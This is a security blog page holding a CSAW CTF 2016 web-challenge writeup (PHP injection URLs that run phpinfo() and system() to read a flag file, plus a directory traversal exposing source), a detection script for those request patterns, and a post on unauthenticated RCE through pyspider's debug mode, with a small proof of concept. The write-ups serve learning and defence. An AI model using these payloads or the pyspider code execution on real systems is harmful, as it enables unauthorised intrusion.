Posts

Showing posts from September, 2016

[Writeup] CSAW CTF 2016

mfw (125)
The main URL:
http://web.chal.csaw.io:8000

Fuzzing it is easy; injecting into the page parameter runs phpinfo():
http://web.chal.csaw.io:8000/?page=about%27.phpinfo%28%29.%27

Now get the flag:
http://web.chal.csaw.io:8000/?page=about%27.system%28%22cat%20templates/flag.php%22%29.%27
flag{3vald_@ss3rt_1s_best_a$$ert}


wtf.sh 1 (150)

http://web.chal.csaw.io:8001
Register an account and log in.
Create a post, then view it.
While fuzzing, I found a directory traversal (WTF? traversal again).
When fuzzing with http://web.chal.csaw.io:8001/post.wtf?post=zabOA/../../ I found some source code. I guess it may be possible to read every file in this directory, like cat * :)).

I found some interesting functions (after using a decoder to view the beautified code):

function hash_password {
    local password=$1;
    (shasum <<< ${password}) | cut -d\  -f1;
}
# hash usernames for lookup in the users_lookup table
function hash_username {
    local username=$1;
    (shasum <<< ${username}) | cut -d\  -f1;
}
# generate a random token, base64 encoded
# on GNU base64 wraps at 76 …
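As an added example (not part of the original writeup or of the challenge code), the following Python scans web-server access-log lines for the two request shapes abused above: a quote-and-concatenation that turns the page parameter into a PHP expression, and ../ traversal in the post parameter. The log lines are constructed to mirror the URLs in the writeup; the combined-log format and the parameter names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access-log lines (not from the original post). The request
# targets reproduce the writeup's URLs plus one benign request on line 1.
SAMPLE_LOG = """\
10.0.0.5 - - [18/Sep/2016:10:01:02 +0000] "GET /?page=about HTTP/1.1" 200 512
10.0.0.5 - - [18/Sep/2016:10:01:09 +0000] "GET /?page=about%27.phpinfo%28%29.%27 HTTP/1.1" 200 9812
10.0.0.5 - - [18/Sep/2016:10:01:15 +0000] "GET /?page=about%27.system%28%22cat%20templates/flag.php%22%29.%27 HTTP/1.1" 200 300
10.0.0.7 - - [18/Sep/2016:10:02:40 +0000] "GET /post.wtf?post=zabOA/../../ HTTP/1.1" 200 4410
"""

# Extracts the request line from a combined-format log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Rules for what the writeup abused: a quote that closes the string inside an
# evaluated PHP expression, followed by a function call; and ../ traversal.
RULES = {
    "php_expression_injection": re.compile(r"""['"]\s*\.\s*\w+\s*\("""),
    "path_traversal": re.compile(r"(^|/)\.\.(/|$)"),
}

def decode_params(target):
    """Return (name, value) query parameters of a request target, URL-decoded."""
    query = urlsplit(target).query
    # parse_qsl decodes once; a second unquote normalises double-encoded payloads.
    return [(k, unquote(v)) for k, v in parse_qsl(query, keep_blank_values=True)]

def scan_line(line):
    """Return a list of (rule, param, decoded_value) hits for one log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    hits = []
    for name, value in decode_params(m.group("target")):
        for rule, pattern in RULES.items():
            if pattern.search(value):
                hits.append((rule, name, value))
    return hits

def scan_log(text):
    """Scan every line; return hits keyed by 1-based line number."""
    findings = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        hits = scan_line(line)
        if hits:
            findings[lineno] = hits
    return findings

if __name__ == "__main__":
    for lineno, hits in scan_log(SAMPLE_LOG).items():
        for rule, param, value in hits:
            print(f"line {lineno}: {rule} in {param}={value!r}")
```

Decoding before matching matters: the payloads in the log are percent-encoded, so a rule applied to the raw request line would miss the quote and parentheses.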

RCE in Pyspider

Today I read an article about exploiting the debug mode in Werkzeug. It is old, but very interesting. When I searched Shodan for websites, I found about 30 sites running pyspider. Pyspider is an open-source Python project; you can download and install it from: https://github.com/binux/pyspider
It has one problem: there is no authentication. Anyone can access it.

When you click on a process, you get to the debug mode, where you can edit the Python code. So you can use it to execute arbitrary code: it is RCE.


This is my POC:
import subprocess
# Run a harmless command on the server and capture its output to prove execution
p = subprocess.Popen(["id"], stdout=subprocess.PIPE)
output, err = p.communicate()
print(output)
Thanks for reading.

Security Research SecurityLab - Linux Lab, Windows and Cisco Lab (to be continued; I will update more).